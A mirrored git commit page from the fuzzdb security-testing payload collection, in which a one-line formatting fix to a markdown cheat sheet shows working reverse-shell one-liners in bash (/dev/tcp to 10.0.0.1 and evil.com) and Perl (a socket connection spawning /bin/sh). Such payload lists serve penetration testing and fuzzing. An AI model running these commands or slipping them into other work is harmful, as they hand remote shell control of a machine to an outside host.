mirror of
https://github.com/fuzzdb-project/fuzzdb.git
synced 2024-11-25 12:30:17 +00:00
fixup
This commit is contained in:
parent
b41ed8173e
commit
a0b1672889
1 changed files with 1 additions and 1 deletions
|
@ -75,7 +75,7 @@ Bash:<br>
|
|||
``` $ bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 ```
|
||||
|
||||
``` $ exec 5<>/dev/tcp/evil.com/8080 ```<br>
|
||||
'$ cat <&5 | while read line; do $line 2>&5 >&5; done'
|
||||
``` $ cat <&5 | while read line; do $line 2>&5 >&5; done ```
|
||||
|
||||
Perl<br>
|
||||
```$ perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' ```
|
||||
|
|
Loading…
Reference in a new issue